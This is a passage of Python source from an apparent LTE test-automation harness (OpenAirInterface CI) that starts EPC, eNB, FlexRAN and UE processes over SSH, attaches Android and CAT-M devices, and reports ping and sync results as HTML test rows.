self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_spgw 2>&1 | stdbuf -o0 tee -a spgw_' + self.testCase_id + '.log &', 'Initializing SPGW-APP task interface: DONE', 30)
else:
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./start_xGw', '\$', 5)
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def CheckFlexranCtrlInstallation(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '':
return
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('ls -ls /opt/flexran_rtc/*/rt_controller', '\$', 5)
result = re.search('/opt/flexran_rtc/build/rt_controller', str(self.ssh.before))
if result is not None:
self.flexranCtrlInstalled = True
logging.debug('Flexran Controller is installed')
self.close()
def InitializeFlexranCtrl(self):
if self.flexranCtrlInstalled == False:
return
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd /opt/flexran_rtc', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f log/*.log', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S echo "build/rt_controller -c log_config/basic_log" > ./my-flexran-ctl.sh', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S chmod 755 ./my-flexran-ctl.sh', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S daemon --unsafe --name=flexran_rtc_daemon --chdir=/opt/flexran_rtc -o /opt/flexran_rtc/log/flexranctl_' + self.testCase_id + '.log ././my-flexran-ctl.sh', '\$', 5)
self.command('ps -aux | grep --color=never rt_controller', '\$', 5)
result = re.search('rt_controller -c ', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1m Initialize FlexRan Controller Completed\u001B[0m')
self.flexranCtrlStarted = True
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def InitializeeNB(self):
if self.eNB_serverId == '0':
lIpAddr = self.eNBIPAddress
lUserName = self.eNBUserName
lPassWord = self.eNBPassword
lSourcePath = self.eNBSourceCodePath
elif self.eNB_serverId == '1':
lIpAddr = self.eNB1IPAddress
lUserName = self.eNB1UserName
lPassWord = self.eNB1Password
lSourcePath = self.eNB1SourceCodePath
elif self.eNB_serverId == '2':
lIpAddr = self.eNB2IPAddress
lUserName = self.eNB2UserName
lPassWord = self.eNB2Password
lSourcePath = self.eNB2SourceCodePath
if lIpAddr == '' or lUserName == '' or lPassWord == '' or lSourcePath == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = False
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.Initialize_eNB_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
# If tracer options is on, running tshark on EPC side and capture traffic b/ EPC and eNB
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('ip addr show | awk -f /tmp/active_net_interfaces.awk | egrep -v "lo|tun"', '\$', 5)
result = re.search('interfaceToUse=(?P<eth_interface>[a-zA-Z0-9\-\_]+)done', str(self.ssh.before))
if result is not None:
eth_interface = result.group('eth_interface')
logging.debug('\u001B[1m Launching tshark on interface ' + eth_interface + '\u001B[0m')
self.EPC_PcapFileName = 'enb_' + self.testCase_id + '_s1log.pcap'
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f /tmp/' + self.EPC_PcapFileName, '\$', 5)
self.command('echo $USER; nohup sudo tshark -f "host ' + lIpAddr +'" -i ' + eth_interface + ' -w /tmp/' + self.EPC_PcapFileName + ' > /tmp/tshark.log 2>&1 &', self.EPCUserName, 5)
self.close()
self.open(lIpAddr, lUserName, lPassWord)
self.command('cd ' + lSourcePath, '\$', 5)
# Initialize_eNB_args usually start with -O and followed by the location in repository
full_config_file = self.Initialize_eNB_args.replace('-O ','')
extra_options = ''
extIdx = full_config_file.find('.conf')
if (extIdx > 0):
extra_options = full_config_file[extIdx + 5:]
# if tracer options is on, compiling and running T Tracer
result = re.search('T_stdout', str(extra_options))
if result is not None:
logging.debug('\u001B[1m Compiling and launching T Tracer\u001B[0m')
self.command('cd common/utils/T/tracer', '\$', 5)
self.command('make', '\$', 10)
self.command('echo $USER; nohup ./record -d ../T_messages.txt -o ' + lSourcePath + '/cmake_targets/enb_' + self.testCase_id + '_record.raw -ON -off VCD -off HEAVY -off LEGACY_GROUP_TRACE -off LEGACY_GROUP_DEBUG > ' + lSourcePath + '/cmake_targets/enb_' + self.testCase_id + '_record.log 2>&1 &', lUserName, 5)
self.command('cd ' + lSourcePath, '\$', 5)
full_config_file = full_config_file[:extIdx + 5]
config_path, config_file = os.path.split(full_config_file)
else:
sys.exit('Insufficient Parameter')
ci_full_config_file = config_path + '/ci-' + config_file
rruCheck = False
result = re.search('^rru|^rcc|^du.band', str(config_file))
if result is not None:
rruCheck = True
# do not reset board twice in IF4.5 case
result = re.search('^rru|^enb|^du.band', str(config_file))
if result is not None:
self.command('echo ' + lPassWord + ' | sudo -S uhd_find_devices', '\$', 10)
result = re.search('type: b200', str(self.ssh.before))
if result is not None:
logging.debug('Found a B2xx device --> resetting it')
self.command('echo ' + lPassWord + ' | sudo -S b2xx_fx3_utils --reset-device', '\$', 10)
# Reloading FGPA bin firmware
self.command('echo ' + lPassWord + ' | sudo -S uhd_find_devices', '\$', 15)
# Make a copy and adapt to EPC / eNB IP addresses
self.command('cp ' + full_config_file + ' ' + ci_full_config_file, '\$', 5)
self.command('sed -i -e \'s/CI_MME_IP_ADDR/' + self.EPCIPAddress + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_ENB_IP_ADDR/' + lIpAddr + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_RCC_IP_ADDR/' + self.eNBIPAddress + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_RRU1_IP_ADDR/' + self.eNB1IPAddress + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_RRU2_IP_ADDR/' + self.eNB2IPAddress + '/\' ' + ci_full_config_file, '\$', 2);
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.command('sed -i -e \'s/FLEXRAN_ENABLED.*;/FLEXRAN_ENABLED = "yes";/\' ' + ci_full_config_file, '\$', 2);
else:
self.command('sed -i -e \'s/FLEXRAN_ENABLED.*;/FLEXRAN_ENABLED = "no";/\' ' + ci_full_config_file, '\$', 2);
# Launch eNB with the modified config file
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('echo "ulimit -c unlimited && ./lte_build_oai/build/lte-softmodem -O ' + lSourcePath + '/' + ci_full_config_file + extra_options + '" > ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.command('chmod 775 ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.command('echo ' + lPassWord + ' | sudo -S rm -Rf enb_' + self.testCase_id + '.log', '\$', 5)
self.command('echo ' + lPassWord + ' | sudo -S -E daemon --inherit --unsafe --name=enb' + str(self.eNB_instance) + '_daemon --chdir=' + lSourcePath + '/cmake_targets -o ' + lSourcePath + '/cmake_targets/enb_' + self.testCase_id + '.log ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.eNBLogFiles[int(self.eNB_instance)] = 'enb_' + self.testCase_id + '.log'
if extra_options != '':
self.eNBOptions[int(self.eNB_instance)] = extra_options
time.sleep(6)
doLoop = True
loopCounter = 10
while (doLoop):
loopCounter = loopCounter - 1
if (loopCounter == 0):
# In case of T tracer recording, we may need to kill it
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.command('killall --signal SIGKILL record', '\$', 5)
self.close()
doLoop = False
logging.error('\u001B[1;37;41m eNB logging system did not show got sync! \u001B[0m')
self.CreateHtmlTestRow('-O ' + config_file + extra_options, 'KO', ALL_PROCESSES_OK)
# In case of T tracer recording, we need to kill tshark on EPC side
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
logging.debug('\u001B[1m Stopping tshark \u001B[0m')
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL tshark', '\$', 5)
if self.EPC_PcapFileName != '':
time.sleep(0.5)
self.command('echo ' + self.EPCPassword + ' | sudo -S chmod 666 /tmp/' + self.EPC_PcapFileName, '\$', 5)
self.close()
time.sleep(1)
if self.EPC_PcapFileName != '':
copyin_res = self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, '/tmp/' + self.EPC_PcapFileName, '.')
if (copyin_res == 0):
self.copyout(lIpAddr, lUserName, lPassWord, self.EPC_PcapFileName, lSourcePath + '/cmake_targets/.')
self.prematureExit = True
return
else:
self.command('stdbuf -o0 cat enb_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync|Starting"', '\$', 4)
if rruCheck:
result = re.search('wait RUs', str(self.ssh.before))
else:
result = re.search('got sync|Starting F1AP at CU', str(self.ssh.before))
if result is None:
time.sleep(6)
else:
doLoop = False
self.CreateHtmlTestRow('-O ' + config_file + extra_options, 'OK', ALL_PROCESSES_OK)
logging.debug('\u001B[1m Initialize eNB Completed\u001B[0m')
time.sleep(10)
self.close()
def InitializeUE_common(self, device_id):
logging.debug('send adb commands')
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# enable data service
self.command('stdbuf -o0 adb -s ' + device_id + ' shell svc data enable', '\$', 60)
# The following commands are deprecated since we no longer work on Android 7+
# self.command('stdbuf -o0 adb -s ' + device_id + ' shell settings put global airplane_mode_on 1', '\$', 10)
# self.command('stdbuf -o0 adb -s ' + device_id + ' shell am broadcast -a android.intent.action.AIRPLANE_MODE --ez state true', '\$', 60)
# a dedicated script has to be installed inside the UE
# airplane mode on means call /data/local/tmp/off
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
#airplane mode off means call /data/local/tmp/on
logging.debug('\u001B[1mUE (' + device_id + ') Initialize Completed\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def InitializeUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.InitializeUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def InitializeOAIUE(self):
if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
if result is None:
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.Initialize_OAI_UE_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
# b2xx_fx3_utils reset procedure
self.command('echo ' + self.UEPassword + ' | sudo -S uhd_find_devices', '\$', 10)
result = re.search('type: b200', str(self.ssh.before))
if result is not None:
logging.debug('Found a B2xx device --> resetting it')
self.command('echo ' + self.UEPassword + ' | sudo -S b2xx_fx3_utils --reset-device', '\$', 10)
# Reloading FGPA bin firmware
self.command('echo ' + self.UEPassword + ' | sudo -S uhd_find_devices', '\$', 15)
else:
logging.debug('Did not find any B2xx device')
self.command('cd ' + self.UESourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets/lte_build_oai/build', '\$', 5)
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
# We may have to regenerate the .u* files
if result is None:
self.command('sed -e "s#93#92#" -e "s#8baf473f2f8fd09487cccbd7097c6862#fec86ba6eb707ed08905757b1bb44b8f#" -e "s#e734f8734007d6c5ce7a0508809e7e9c#C42449363BBAD02B66D16BC975D77CC1#" ../../../openair3/NAS/TOOLS/ue_eurecom_test_sfr.conf > ../../../openair3/NAS/TOOLS/ci-ue_eurecom_test_sfr.conf', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S rm -Rf .u*', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S ../../../targets/bin/conf2uedata -c ../../../openair3/NAS/TOOLS/ci-ue_eurecom_test_sfr.conf -o .', '\$', 5)
# Launch UE with the modified config file
self.command('echo "ulimit -c unlimited && ./lte-uesoftmodem ' + self.Initialize_OAI_UE_args + '" > ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
self.command('chmod 775 ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
self.UELogFile = 'ue_' + self.testCase_id + '.log'
# We are now looping several times to hope we really sync w/ an eNB
doOutterLoop = True
outterLoopCounter = 5
gotSyncStatus = True
fullSyncStatus = True
while (doOutterLoop):
self.command('cd ' + self.UESourceCodePath + '/cmake_targets/lte_build_oai/build', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S rm -Rf ' + self.UESourceCodePath + '/cmake_targets/ue_' + self.testCase_id + '.log', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S -E daemon --inherit --unsafe --name=ue' + str(self.UE_instance) + '_daemon --chdir=' + self.UESourceCodePath + '/cmake_targets/lte_build_oai/build -o ' + self.UESourceCodePath + '/cmake_targets/ue_' + self.testCase_id + '.log ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
time.sleep(6)
self.command('cd ../..', '\$', 5)
doLoop = True
loopCounter = 10
gotSyncStatus = True
# the 'got sync' message is for the UE threads synchronization
while (doLoop):
loopCounter = loopCounter - 1
if (loopCounter == 0):
# Here should never occur
logging.error('"got sync" message never showed!')
gotSyncStatus = False
doLoop = False
continue
self.command('stdbuf -o0 cat ue_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync"', '\$', 4)
result = re.search('got sync', str(self.ssh.before))
if result is None:
time.sleep(6)
else:
doLoop = False
logging.debug('Found "got sync" message!')
if gotSyncStatus == False:
# we certainly need to stop the lte-uesoftmodem process if it is still running!
self.command('ps -aux | grep --text --color=never softmodem | grep -v grep', '\$', 4)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.UEPassword + ' | sudo -S killall --signal=SIGINT lte-uesoftmodem', '\$', 4)
time.sleep(3)
# We are now checking if sync w/ eNB DOES NOT OCCUR
# Usually during the cell synchronization stage, the UE returns with No cell synchronization message
doLoop = True
loopCounter = 10
while (doLoop):
loopCounter = loopCounter - 1
if (loopCounter == 0):
# Here we do have a great chance that the UE did cell-sync w/ eNB
doLoop = False
doOutterLoop = False
fullSyncStatus = True
continue
self.command('stdbuf -o0 cat ue_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync"', '\$', 4)
result = re.search('No cell synchronization found', str(self.ssh.before))
if result is None:
time.sleep(6)
else:
doLoop = False
fullSyncStatus = False
logging.debug('Found: "No cell synchronization" message! --> try again')
time.sleep(6)
self.command('ps -aux | grep --text --color=never softmodem | grep -v grep', '\$', 4)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.UEPassword + ' | sudo -S killall --signal=SIGINT lte-uesoftmodem', '\$', 4)
outterLoopCounter = outterLoopCounter - 1
if (outterLoopCounter == 0):
doOutterLoop = False
if fullSyncStatus and gotSyncStatus:
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
if result is None:
self.command('ifconfig oaitun_ue1', '\$', 4)
result = re.search('inet addr', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1m oaitun_ue1 interface is mounted and configured\u001B[0m')
tunnelInterfaceStatus = True
else:
logging.error('\u001B[1m oaitun_ue1 interface is either NOT mounted or NOT configured\u001B[0m')
tunnelInterfaceStatus = False
else:
tunnelInterfaceStatus = True
self.close()
if fullSyncStatus and gotSyncStatus and tunnelInterfaceStatus:
self.CreateHtmlTestRow(self.Initialize_OAI_UE_args, 'OK', ALL_PROCESSES_OK, 'OAI UE')
logging.debug('\u001B[1m Initialize OAI UE Completed\u001B[0m')
else:
self.htmlUEFailureMsg = 'oaitun_ue1 interface is either NOT mounted or NOT configured'
self.CreateHtmlTestRow(self.Initialize_OAI_UE_args, 'KO', OAI_UE_PROCESS_NO_TUNNEL_INTERFACE, 'OAI UE')
logging.error('\033[91mInitialize OAI UE Failed! \033[0m')
self.AutoTerminateUEandeNB()
def checkDevTTYisUnlocked(self):
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
count = 0
while count < 5:
self.command('echo ' + self.ADBPassword + ' | sudo -S lsof | grep ttyUSB0', '\$', 10)
result = re.search('picocom', str(self.ssh.before))
if result is None:
count = 10
else:
time.sleep(5)
count = count + 1
self.close()
def InitializeCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session. The picocom command does NOT handle well the `sudo -S`
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Disabling the Radio
self.command('AT+CFUN=0', 'OK', 5)
logging.debug('\u001B[1m Cellular Functionality disabled\u001B[0m')
# Checking if auto-attach is enabled
self.command('AT^AUTOATT?', 'OK', 5)
result = re.search('AUTOATT: (?P<state>[0-9\-]+)', str(self.ssh.before))
if result is not None:
if result.group('state') is not None:
autoAttachState = int(result.group('state'))
if autoAttachState is not None:
if autoAttachState == 0:
self.command('AT^AUTOATT=1', 'OK', 5)
logging.debug('\u001B[1m Auto-Attach enabled\u001B[0m')
else:
logging.debug('\u001B[1;37;41m Could not check Auto-Attach! \u001B[0m')
# Force closure of picocom but device might still be locked
self.close()
self.picocom_closure = False
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.checkDevTTYisUnlocked()
def TerminateCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session. The picocom command does NOT handle well the `sudo -S`
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Disabling the Radio
self.command('AT+CFUN=0', 'OK', 5)
logging.debug('\u001B[1m Cellular Functionality disabled\u001B[0m')
self.close()
self.picocom_closure = False
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.checkDevTTYisUnlocked()
def AttachCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session. The picocom command does NOT handle well the `sudo -S`
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Enabling the Radio
self.command('AT+CFUN=1', 'SIMSTORE,READY', 5)
logging.debug('\u001B[1m Cellular Functionality enabled\u001B[0m')
time.sleep(4)
# We should check if we register
count = 0
attach_cnt = 0
attach_status = False
while count < 5:
self.command('AT+CEREG?', 'OK', 5)
result = re.search('CEREG: 2,(?P<state>[0-9\-]+),', str(self.ssh.before))
if result is not None:
mDataConnectionState = int(result.group('state'))
if mDataConnectionState is not None:
if mDataConnectionState == 1:
count = 10
attach_status = True
result = re.search('CEREG: 2,1,"(?P<networky>[0-9A-Z]+)","(?P<networkz>[0-9A-Z]+)"', str(self.ssh.before))
if result is not None:
networky = result.group('networky')
networkz = result.group('networkz')
logging.debug('\u001B[1m CAT-M module attached to eNB (' + str(networky) + '/' + str(networkz) + ')\u001B[0m')
else:
logging.debug('\u001B[1m CAT-M module attached to eNB\u001B[0m')
else:
logging.debug('+CEREG: 2,' + str(mDataConnectionState))
attach_cnt = attach_cnt + 1
else:
logging.debug(str(self.ssh.before))
attach_cnt = attach_cnt + 1
count = count + 1
time.sleep(1)
if attach_status:
self.command('AT+CESQ', 'OK', 5)
result = re.search('CESQ: 99,99,255,255,(?P<rsrq>[0-9]+),(?P<rsrp>[0-9]+)', str(self.ssh.before))
if result is not None:
nRSRQ = int(result.group('rsrq'))
nRSRP = int(result.group('rsrp'))
if (nRSRQ is not None) and (nRSRP is not None):
logging.debug(' RSRQ = ' + str(-20+(nRSRQ/2)) + ' dB')
logging.debug(' RSRP = ' + str(-140+nRSRP) + ' dBm')
self.close()
self.picocom_closure = False
html_queue = SimpleQueue()
self.checkDevTTYisUnlocked()
if attach_status:
html_cell = '<pre style="background-color:white">CAT-M module\nAttachment Completed in ' + str(attach_cnt+4) + ' seconds'
if (nRSRQ is not None) and (nRSRP is not None):
html_cell += '\n RSRQ = ' + str(-20+(nRSRQ/2)) + ' dB'
html_cell += '\n RSRP = ' + str(-140+nRSRP) + ' dBm</pre>'
else:
html_cell += '</pre>'
html_queue.put(html_cell)
self.CreateHtmlTestRowQueue('N/A', 'OK', 1, html_queue)
else:
html_cell = '<pre style="background-color:white">CAT-M module\nAttachment Failed</pre>'
html_queue.put(html_cell)
self.CreateHtmlTestRowQueue('N/A', 'KO', 1, html_queue)
def PingCatM(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.prematureExit = True
return
try:
statusQueue = SimpleQueue()
lock = Lock()
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC HSS: not implemented yet')
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
else:
self.command('egrep --color=never "Allocated ipv4 addr" /opt/ltebox/var/log/xGwLog.0', '\$', 5)
result = re.search('Allocated ipv4 addr: (?P<ipaddr>[0-9\.]+) from Pool', str(self.ssh.before))
if result is not None:
moduleIPAddr = result.group('ipaddr')
else:
return
ping_time = re.findall("-c (\d+)",str(self.ping_args))
device_id = 'catm'
ping_status = self.command('stdbuf -o0 ping ' + self.ping_args + ' ' + str(moduleIPAddr) + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '_' + device_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with UE (' + str(moduleIPAddr) + ') crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', str(self.ssh.before))
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', str(self.ssh.before))
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
lock.acquire()
logging.debug('\u001B[1;37;44m ping result (' + moduleIPAddr + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
lock.release()
self.close()
html_cell = '<pre style="background-color:white">CAT-M module\nIP Address : ' + moduleIPAddr + '\n' + qMsg + '</pre>'
statusQueue.put(html_cell)
if (packetLossOK):
self.CreateHtmlTestRowQueue(self.ping_args, 'OK', 1, statusQueue)
else:
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', 1, statusQueue)
self.AutoTerminateUEandeNB()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AttachUE_common(self, device_id, statusQueue, lock):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/on"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/on', '\$', 60)
time.sleep(2)
max_count = 45
count = max_count
while count > 0:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m mDataConnectionState Not Found! \u001B[0m')
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put('mDataConnectionState Not Found!')
lock.release()
break
mDataConnectionState = int(result.group('state'))
if mDataConnectionState == 2:
logging.debug('\u001B[1mUE (' + device_id + ') Attach Completed\u001B[0m')
lock.acquire()
statusQueue.put(max_count - count)
statusQueue.put(device_id)
statusQueue.put('Attach Completed')
lock.release()
break
count = count - 1
if count == 15 or count == 30:
logging.debug('\u001B[1;30;43m Retry UE (' + device_id + ') Flight Mode Off \u001B[0m')
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
time.sleep(0.5)
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/on"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/on', '\$', 60)
time.sleep(0.5)
logging.debug('\u001B[1mWait UE (' + device_id + ') a second until mDataConnectionState=2 (' + str(max_count-count) + ' times)\u001B[0m')
time.sleep(1)
if count == 0:
logging.debug('\u001B[1;37;41m UE (' + device_id + ') Attach Failed \u001B[0m')
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put('Attach Failed')
lock.release()
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AttachUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
status_queue = SimpleQueue()
lock = Lock()
nb_ue_to_connect = 0
for device_id in self.UEDevices:
if (self.nbMaxUEtoAttach == -1) or (nb_ue_to_connect < self.nbMaxUEtoAttach):
self.UEDevicesStatus[nb_ue_to_connect] = UE_STATUS_ATTACHING
